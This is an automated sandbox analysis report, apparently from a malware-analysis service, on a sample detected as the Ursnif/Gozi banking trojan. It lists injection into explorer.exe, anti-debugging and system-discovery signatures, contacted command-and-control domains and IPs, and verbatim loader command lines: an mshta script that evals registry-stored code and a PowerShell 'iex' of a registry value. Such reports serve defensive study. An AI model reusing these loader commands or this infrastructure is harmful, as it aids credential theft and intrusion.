Source: explorer.exe, 00000024.00000000.973509151.00000000058C0000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000024.00000000.980269639.000000000A60E000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000024.00000000.975003491.0000000006650000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000024.00000000.980269639.000000000A60E000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000024.00000002.1048815971.0000000004710000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
Source: explorer.exe, 00000024.00000000.973509151.00000000058C0000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000024.00000000.980902186.000000000A716000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
Source: explorer.exe, 00000024.00000000.973509151.00000000058C0000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000024.00000000.980902186.000000000A716000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
Source: explorer.exe, 00000024.00000000.973509151.00000000058C0000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Windows\SysWOW64\regsvr32.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging:

barindex
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05FA95DC LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 2_2_05FA95DC
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05FC16A5 ConvertStringSecurityDescriptorToSecurityDescriptorA,StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler, 2_2_05FC16A5

HIPS / PFW / Operating System Protection Evasion:

barindex
Changes memory attributes in foreign processes to executable or writable
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute read
Source: C:\Windows\explorer.exe Memory protected: unknown base: 7FFABD4F1580 protect: page execute and read and write
Compiles code for process injection (via .Net compiler)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File written: C:\Users\user\AppData\Local\Temp\m5xmn43s\m5xmn43s.0.cs Jump to dropped file
Creates a thread in another existing process (thread injection)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: C:\Windows\explorer.exe EIP: BD4F1580
Source: C:\Windows\explorer.exe Thread created: unknown EIP: BD4F1580
Source: C:\Windows\explorer.exe Thread created: unknown EIP: BD4F1580
Source: C:\Windows\explorer.exe Thread created: unknown EIP: BD4F1580
Source: C:\Windows\explorer.exe Thread created: unknown EIP: BD4F1580
Source: C:\Windows\explorer.exe Thread created: unknown EIP: BD4F1580
Source: C:\Windows\explorer.exe Thread created: unknown EIP: BD4F1580
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3424 base: 9F0000 value: 00
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3424 base: 7FFABD4F1580 value: EB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3424 base: 3110000 value: 80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: PID: 3424 base: 7FFABD4F1580 value: 40
Maps a DLL or memory area into another process
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: unknown protection: execute and read and write
Source: C:\Windows\explorer.exe Section loaded: unknown target: C:\Program Files\internet explorer\iexplore.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread register set: target process: 3424
Source: C:\Windows\explorer.exe Thread register set: target process: 3656
Source: C:\Windows\explorer.exe Thread register set: target process: 4268
Source: C:\Windows\explorer.exe Thread register set: target process: 4772
Source: C:\Windows\explorer.exe Thread register set: target process: 5876
Source: C:\Windows\explorer.exe Thread register set: target process: 6272
Source: C:\Windows\explorer.exe Thread register set: target process: 4112
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\System32\control.exe base: 7FF7D01D12E0 Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Memory written: C:\Windows\System32\control.exe base: 7FF7D01D12E0 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 9F0000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 7FFABD4F1580
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 3110000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\explorer.exe base: 7FFABD4F1580
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe' Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\fcanujkk\fcanujkk.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\m5xmn43s\m5xmn43s.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES352.tmp' 'c:\Users\user\AppData\Local\Temp\fcanujkk\CSC3173F20A33D44EE3A49D2AFD78C0E6C5.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES1BBC.tmp' 'c:\Users\user\AppData\Local\Temp\m5xmn43s\CSCBE8D23AB53C749FF947299C54732EF79.TMP'
Source: C:\Windows\System32\control.exe Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
Source: explorer.exe, 00000024.00000000.955462223.0000000000AD8000.00000004.00000020.sdmp Binary or memory string: ProgmanMD6
Source: explorer.exe, 00000024.00000002.1037964161.0000000001080000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000024.00000000.974965650.0000000005E50000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000024.00000002.1037964161.0000000001080000.00000002.00000001.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000024.00000002.1037964161.0000000001080000.00000002.00000001.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000024.00000000.980902186.000000000A716000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWnd5D

Language, Device and Operating System Detection:

barindex
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05FB04D7 cpuid 2_2_05FB04D7
Queries the installation date of Windows
Source: C:\Windows\SysWOW64\regsvr32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05FBB585 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError, 2_2_05FBB585
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05FBCF2A GetSystemTimeAsFileTime,HeapFree, 2_2_05FBCF2A
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05FB7AFF RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA, 2_2_05FB7AFF
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05FA3DD8 GetVersion,GetLastError, 2_2_05FA3DD8
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000002.00000003.860537429.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.860574233.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.860667381.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.860601592.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.860502446.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.860680858.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.998924828.0000000005FA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.876294685.00000000059AB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.938337595.0000000003320000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.945623628.000001E7C36E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.1049878498.0000000004DDE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.860649674.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.860628580.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 6988, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3424, type: MEMORY

Remote Access Functionality:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000002.00000003.860537429.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.860574233.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.860667381.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.860601592.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.860502446.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.860680858.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.998924828.0000000005FA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.876294685.00000000059AB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.938337595.0000000003320000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.945623628.000001E7C36E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.1049878498.0000000004DDE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.860649674.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.860628580.0000000005B28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 6988, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3424, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 343096 Sample: SecuriteInfo.com.Generic.mg... Startdate: 22/01/2021 Architecture: WINDOWS Score: 100 68 resolver1.opendns.com 2->68 96 Multi AV Scanner detection for domain / URL 2->96 98 Found malware configuration 2->98 100 Malicious sample detected (through community Yara rule) 2->100 102 12 other signatures 2->102 10 mshta.exe 2->10         started        13 loaddll32.exe 1 2->13         started        signatures3 process4 signatures5 114 Suspicious powershell command line found 10->114 15 powershell.exe 10->15         started        19 regsvr32.exe 2 13->19         started        21 cmd.exe 1 13->21         started        process6 file7 64 C:\Users\user\AppData\Local\...\m5xmn43s.0.cs, UTF-8 15->64 dropped 66 C:\Users\user\AppData\...\fcanujkk.cmdline, UTF-8 15->66 dropped 82 Injects code into the Windows Explorer (explorer.exe) 15->82 84 Writes to foreign memory regions 15->84 86 Modifies the context of a thread in another process (thread injection) 15->86 94 3 other signatures 15->94 23 explorer.exe 15->23 injected 27 csc.exe 15->27         started        30 csc.exe 15->30         started        32 conhost.exe 15->32         started        88 Detected Gozi e-Banking trojan 19->88 90 Writes or reads registry keys via WMI 19->90 92 Writes registry values via WMI 19->92 34 control.exe 19->34         started        36 iexplore.exe 1 86 21->36         started        signatures8 process9 dnsIp10 70 c56.lepini.at 23->70 72 api3.lepini.at 23->72 106 Changes memory attributes in foreign processes to executable or writable 23->106 108 Modifies the context of a thread in another process (thread injection) 23->108 110 Maps a DLL or memory area into another process 23->110 112 2 other signatures 23->112 38 cmd.exe 23->38         started        60 C:\Users\user\AppData\Local\...\fcanujkk.dll, PE32 27->60 dropped 41 cvtres.exe 27->41         started        62 C:\Users\user\AppData\Local\...\m5xmn43s.dll, PE32 30->62 dropped 43 cvtres.exe 30->43         started        45 rundll32.exe 34->45         started        47 iexplore.exe 144 36->47         started        50 iexplore.exe 29 36->50         started        52 iexplore.exe 29 36->52         started        54 iexplore.exe 36->54         started        file11 signatures12 process13 dnsIp14 104 Uses ping.exe to sleep 38->104 56 conhost.exe 38->56         started        58 PING.EXE 38->58         started        74 img.img-taboola.com 47->74 76 tls13.taboola.map.fastly.net 151.101.1.44, 443, 49759, 49760 FASTLYUS United States 47->76 80 7 other IPs or domains 47->80 78 api10.laptok.at 45.138.24.6, 49792, 49793, 49796 SPECTRAIPSpectraIPBVNL Turkey 50->78 signatures15 process16
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
45.138.24.6
 unknown Turkey
62068 SPECTRAIPSpectraIPBVNL true
151.101.1.44
 unknown United States
54113 FASTLYUS false

Contacted Domains

Name IP Active
contextual.media.net 104.84.56.24 true
tls13.taboola.map.fastly.net 151.101.1.44 true
hblg.media.net 104.84.56.24 true
c56.lepini.at 45.138.24.6 true
lg3.media.net 104.84.56.24 true
resolver1.opendns.com 208.67.222.222 true
api3.lepini.at 45.138.24.6 true
api10.laptok.at 45.138.24.6 true
web.vortex.data.msn.com unknown unknown
www.msn.com unknown unknown
srtb.msn.com unknown unknown
img.img-taboola.com unknown unknown
cvision.media.net unknown unknown